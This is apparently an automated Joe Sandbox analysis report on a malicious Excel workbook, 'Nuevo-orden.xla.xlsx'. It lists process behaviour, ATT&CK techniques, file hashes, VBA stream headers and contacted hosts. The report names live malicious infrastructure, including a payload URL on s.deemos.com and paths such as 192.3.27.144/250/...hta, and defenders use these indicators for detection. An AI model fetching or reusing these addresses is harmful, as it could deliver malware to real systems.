Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: Nuevo-orden.xla.xlsxStream path 'Workbook' entropy: 7.99874475743 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 829Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts13
Exploitation for Client Execution
1
Scripting
1
Process Injection
2
Masquerading
OS Credential Dumping1
Process Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Extra Window Memory Injection
1
Process Injection
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets2
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Extra Window Memory Injection
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Nuevo-orden.xla.xlsx18%ReversingLabs
Nuevo-orden.xla.xlsx100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://s.deemos.com/6ruXkfgh?&sherry=strange&octagon=fragile&initiative=rough&corsage0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
s.deemos.com
14.103.79.10
truefalse
    high
    s-part-0017.t-0009.t-msedge.net
    13.107.246.45
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      https://s.deemos.com/6ruXkfgh?&sherry=strange&octagon=fragile&initiative=rough&corsagefalse
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      14.103.79.10
      s.deemos.comChina
      18002WORLDPHONE-INASNumberforInterdomainRoutingINfalse
      192.3.27.144
      unknownUnited States
      36352AS-COLOCROSSINGUSfalse
      Joe Sandbox version:42.0.0 Malachite
      Analysis ID:1586900
      Start date and time:2025-01-09 18:45:07 +01:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 4m 53s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Run name:Without Instrumentation
      Number of analysed new started processes analysed:13
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:Nuevo-orden.xla.xlsx
      Detection:MAL
      Classification:mal64.expl.winXLSX@6/4@1/2
      EGA Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Found application associated with file extension: .xlsx
      • Changed system and user locale, location and keyboard layout to French - France
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Active ActiveX Object
      • Active ActiveX Object
      • Scroll down
      • Close Viewer
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe, MavInject32.exe
      • Excluded IPs from analysis (whitelisted): 52.109.28.46, 52.113.194.132, 23.56.254.164, 52.109.89.19, 2.22.50.144, 2.22.50.131, 20.42.73.24, 20.42.65.93, 51.105.71.136, 20.190.159.2, 4.175.87.197, 13.107.246.45
      • Excluded domains from analysis (whitelisted): onedscolprdeus20.eastus.cloudapp.azure.com, slscr.update.microsoft.com, otelrules.afd.azureedge.net, weu-azsc-000.roaming.officeapps.live.com, onedscolprdeus03.eastus.cloudapp.azure.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, eur.roaming1.live.com.akadns.net, mobile.events.data.microsoft.com, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, onedscolprduks00.uksouth.cloudapp.azure.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-offi
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtCreateKey calls found.
      • Report size getting too big, too many NtQueryAttributesFile calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • Report size getting too big, too many NtReadVirtualMemory calls found.
      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
      • VT rate limit hit for: Nuevo-orden.xla.xlsx
      TimeTypeDescription
      12:47:05API Interceptor854x Sleep call for process: splwow64.exe modified
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      14.103.79.10PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
        PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
          PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
            MS100384UTC.xlsGet hashmaliciousUnknownBrowse
              MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                  SWIFT.xlsGet hashmaliciousUnknownBrowse
                    SWIFT.xlsGet hashmaliciousUnknownBrowse
                      192.3.27.144sweetnessgoodforgreatnessthingswithgood.tIF.vbsGet hashmaliciousSmokeLoaderBrowse
                      • 192.3.27.144/250/evenmegoodfor.txt
                      begoodforeverythinggreatthingsformebetterforgood.htaGet hashmaliciousCobalt Strike, SmokeLoaderBrowse
                      • 192.3.27.144/250/evenmegoodfor.txt
                      PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                      • 192.3.27.144/250/gse/begoodforeverythinggreatthingsformebetterforgood.hta
                      PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                      • 192.3.27.144/250/gse/begoodforeverythinggreatthingsformebetterforgood.hta
                      PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                      • 192.3.27.144/250/gse/begoodforeverythinggreatthingsformebetterforgood.hta
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      s.deemos.comPO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                      • 14.103.79.10
                      PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                      • 14.103.79.10
                      PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                      • 14.103.79.10
                      MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                      • 14.103.79.10
                      MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                      • 14.103.79.10
                      MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                      • 14.103.79.10
                      SWIFT.xlsGet hashmaliciousUnknownBrowse
                      • 14.103.79.10
                      SWIFT.xlsGet hashmaliciousUnknownBrowse
                      • 14.103.79.10
                      s-part-0017.t-0009.t-msedge.netReIayMSG__polarisrx.com_#7107380109.htmGet hashmaliciousHTMLPhisherBrowse
                      • 13.107.246.45
                      ReIayMSG__polarisrx.com_#6577807268.htmGet hashmaliciousHTMLPhisherBrowse
                      • 13.107.246.45
                      Appraisal-nation-Review_and_Signature_Request46074.pdfGet hashmaliciousUnknownBrowse
                      • 13.107.246.45
                      PO_62401394_MITech_20250701.exeGet hashmaliciousFormBookBrowse
                      • 13.107.246.45
                      Fqtwswg.exeGet hashmaliciousUnknownBrowse
                      • 13.107.246.45
                      BPD-003777.exeGet hashmaliciousUnknownBrowse
                      • 13.107.246.45
                      new.batGet hashmaliciousUnknownBrowse
                      • 13.107.246.45
                      https://bryf.atchirlisc.ru/EeMAGvIe/Get hashmaliciousHTMLPhisherBrowse
                      • 13.107.246.45
                      Payment 01.08.25.pdf.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                      • 13.107.246.45
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      WORLDPHONE-INASNumberforInterdomainRoutingINPO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                      • 14.103.79.10
                      PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                      • 14.103.79.10
                      PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                      • 14.103.79.10
                      miori.m68k.elfGet hashmaliciousUnknownBrowse
                      • 14.103.40.215
                      MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                      • 14.103.79.10
                      MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                      • 14.103.79.10
                      MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                      • 14.103.79.10
                      SWIFT.xlsGet hashmaliciousUnknownBrowse
                      • 14.103.79.10
                      AS-COLOCROSSINGUSsh4.elfGet hashmaliciousMiraiBrowse
                      • 23.95.117.229
                      sweetnessgoodforgreatnessthingswithgood.tIF.vbsGet hashmaliciousSmokeLoaderBrowse
                      • 192.3.27.144
                      begoodforeverythinggreatthingsformebetterforgood.htaGet hashmaliciousCobalt Strike, SmokeLoaderBrowse
                      • 192.3.27.144
                      PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                      • 192.3.27.144
                      PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                      • 192.3.27.144
                      PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                      • 192.3.27.144
                      miori.ppc.elfGet hashmaliciousUnknownBrowse
                      • 192.210.142.114
                      9876567899.bat.exeGet hashmaliciousLokibotBrowse
                      • 172.245.123.11
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      6271f898ce5be7dd52b0fc260d0662b3phish_alert_sp2_2.0.0.0 (1).emlGet hashmaliciousUnknownBrowse
                      • 14.103.79.10
                      PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                      • 14.103.79.10
                      PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                      • 14.103.79.10
                      http://www.cipassoitalia.it/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                      • 14.103.79.10
                      ipmsg5.6.18_installer.exeGet hashmaliciousUnknownBrowse
                      • 14.103.79.10
                      https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102Get hashmaliciousUnknownBrowse
                      • 14.103.79.10
                      skript.batGet hashmaliciousVidarBrowse
                      • 14.103.79.10
                      GtEVo1eO2p.exeGet hashmaliciousLummaCBrowse
                      • 14.103.79.10
                      NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                      • 14.103.79.10
                      No context
                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):118
                      Entropy (8bit):3.5700810731231707
                      Encrypted:false
                      SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                      MD5:573220372DA4ED487441611079B623CD
                      SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                      SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                      SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):836
                      Entropy (8bit):2.7151910322565733
                      Encrypted:false
                      SSDEEP:24:J3fIxk+vpKAk6ScvoGA8xpiOnAvJ5yoIHWK:h3+RfkpcvoGAYcvJ5LIHD
                      MD5:92A7E6E963E0E668F6585E8694F68380
                      SHA1:9CFB8F0EA9A80C54FEBF664E2E8DA3A20C6F5DAE
                      SHA-256:F09EE04026948847263A11CC3D3276A676246EF074A985681DBEF03D76801482
                      SHA-512:F3E94DC16458B4CE76A18D44360256A233CDF918A34FDB0AB3A85AF5FA3ADEB8B0BBB173CE658D8344939FE77AEB467C04D111A887424A65BA2833897DE3F4E2
                      Malicious:false
                      Reputation:moderate, very likely benign file
                      Preview:1.1.9.,.1.2.5.,.2.5.5.0.5.0.8.8.,.1.1.9.6.3.7.8.,.3.7.4.6.3.7.6.,.1.7.8.8.6.5.8.,.7.0.0.9.9.8.4.,.3.0.0.4.9.2.6.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.2.3.7.1.6.5.1.,.6.3.6.4.3.3.4.,.3.0.1.5.3.7.2.1.,.1.1.1.1.,.6.3.6.4.3.3.7.,.1.0.0.1.,.6.5.4.0.2.1.5.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.2.4.6.0.9.2.5.8.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.6.3.7.1.6.9.4.,.2.7.1.5.3.4.9.7.,.5.9.2.2.3.4.2.3.,.1.5.6.1.9.5.8.,.5.7.9.9.9.6.6.1.,.5.8.4.2.5.8.6.0.,.2.7.3.6.0.0.9.5.,.6.3.0.6.3.0.9.9.,.6.3.6.4.3.3.0.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.1.6.5.7.4.5.3.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.2.,.1.0.6.9.5.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.7.7.1.6.5.7.,.1.3.5.2.5.8.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.3.2.0.5.9.2.7.6.7.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.1.1.9.6.2.9.3.,.
                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):512
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3::
                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):165
                      Entropy (8bit):1.4377382811115937
                      Encrypted:false
                      SSDEEP:3:KVC+cAmltV:KVC+cR
                      MD5:9C7132B2A8CABF27097749F4D8447635
                      SHA1:71D7F78718A7AFC3EAB22ED395321F6CBE2F9899
                      SHA-256:7029AE5479F0CD98D892F570A22B2AE8302747DCFF3465B2DE64D974AE815A83
                      SHA-512:333AC8A4987CC7DF5981AE81238A77D123996DB2C4C97053E8BD2048A64FDCF33E1245DEE6839358161F6B5EEA6BFD8D2358BC4A9188D786295C22F79E2D635E
                      Malicious:true
                      Preview:.user ..j.o.n.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Jan 9 12:54:19 2025, Security: 1
                      Entropy (8bit):7.730868275434714
                      TrID:
                      • Microsoft Excel sheet (30009/1) 47.99%
                      • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                      • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                      File name:Nuevo-orden.xla.xlsx
                      File size:1'091'584 bytes
                      MD5:3851138774f61b2de118337f4c787f57
                      SHA1:5550ce43b2bf41ba056404a0924e458e3954af80
                      SHA256:2b14225a0e97081a7142e16423136b06c17cea24ed34b9e696864823468d7dfc
                      SHA512:7217c8de08b1215eed9ec8b08af7774ca2589d51bf973f44ff1f8893b34bf91668963d68496aa260f5856d4048a29045b46d01243405952bfea719fcb69dfffd
                      SSDEEP:24576:fea3tjAb1ZbcPBsTYkX3bV/bARM8Dt23USiYZ+ao8IzmBl:f53lgkP28kX3bVEcktaJl
                      TLSH:7535F0D2BA8D9B52C926073075F34B9E1721AC07E962827B22F4731D6BF76D08503F96
                      File Content Preview:........................>...............................................................................A...B...................s.......u......................................................................................................................
                      Icon Hash:35e58a8c0c8a85b9
                      Document Type:OLE
                      Number of OLE Files:1
                      Has Summary Info:
                      Application Name:Microsoft Excel
                      Encrypted Document:True
                      Contains Word Document Stream:False
                      Contains Workbook/Book Stream:True
                      Contains PowerPoint Document Stream:False
                      Contains Visio Document Stream:False
                      Contains ObjectPool Stream:False
                      Flash Objects Count:0
                      Contains VBA Macros:True
                      Code Page:1252
                      Author:
                      Last Saved By:
                      Create Time:2006-09-16 00:00:00
                      Last Saved Time:2025-01-09 12:54:19
                      Creating Application:Microsoft Excel
                      Security:1
                      Document Code Page:1252
                      Thumbnail Scaling Desired:False
                      Contains Dirty Links:False
                      Shared Document:False
                      Changed Hyperlinks:False
                      Application Version:786432
                      General
                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                      VBA File Name:Sheet1.cls
                      Stream Size:977
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . G . s . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 47 ce a5 73 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Attribute VB_Name = "Sheet1"
                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                      Attribute VB_GlobalNameSpace = False
                      Attribute VB_Creatable = False
                      Attribute VB_PredeclaredId = True
                      Attribute VB_Exposed = True
                      Attribute VB_TemplateDerived = False
                      Attribute VB_Customizable = True
                      

                      General
                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                      VBA File Name:Sheet2.cls
                      Stream Size:977
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . G W . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 47 ce fa 57 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Attribute VB_Name = "Sheet2"
                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                      Attribute VB_GlobalNameSpace = False
                      Attribute VB_Creatable = False
                      Attribute VB_PredeclaredId = True
                      Attribute VB_Exposed = True
                      Attribute VB_TemplateDerived = False
                      Attribute VB_Customizable = True
                      

                      General
                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                      VBA File Name:Sheet3.cls
                      Stream Size:977
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . G ' E . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 47 ce 27 45 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Attribute VB_Name = "Sheet3"
                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                      Attribute VB_GlobalNameSpace = False
                      Attribute VB_Creatable = False
                      Attribute VB_PredeclaredId = True
                      Attribute VB_Exposed = True
                      Attribute VB_TemplateDerived = False
                      Attribute VB_Customizable = True
                      

                      General
                      Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                      VBA File Name:ThisWorkbook.cls
                      Stream Size:985
                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . G . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . -
                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 47 ce 9f 17 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Attribute VB_Name = "ThisWorkbook"
                      Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                      Attribute VB_GlobalNameSpace = False
                      Attribute VB_Creatable = False
                      Attribute VB_PredeclaredId = True
                      Attribute VB_Exposed = True
                      Attribute VB_TemplateDerived = False
                      Attribute VB_Customizable = True
                      

                      General
                      Stream Path:\x1CompObj
                      CLSID:
                      File Type:data
                      Stream Size:114
                      Entropy:4.25248375192737
                      Base64 Encoded:True
                      Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                      General
                      Stream Path:\x5DocumentSummaryInformation
                      CLSID:
                      File Type:data
                      Stream Size:244
                      Entropy:2.889430592781307
                      Base64 Encoded:False
